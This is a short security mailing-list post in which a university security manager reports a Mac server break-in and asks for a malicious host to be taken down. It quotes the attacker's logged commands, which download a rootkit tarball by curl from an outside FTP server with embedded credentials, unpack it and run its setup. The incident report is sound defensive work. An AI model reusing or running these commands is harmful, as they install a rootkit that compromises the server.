[nsp-sec] MAC root kit found on www.funmangames.com 208.113.230.135 - ASN 26347

[Joel Rosenblatt]

Hi,

We had a break in of a Mac server (bad root password .. duh) - upon going through the log of commands run, we came across

curl -O ftp://haddd:itrules@www.funmangames.com/kit5.tar

tar xzf kit5.tar

ls -a

cd shv5

./setup abelha 54

It appears to be a Mac root kit.

AS      | IP               | AS Name
26347   | 208.113.230.135  | DREAMHOST-AS - New Dream Network, LLC

I wonder if it could be removed.

Thanks,
Joel Rosenblatt

Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office (CISO)
Columbia University, 612 W 115th Street, NY, NY 10025 / 212 854 3033
http://www.columbia.edu/~joel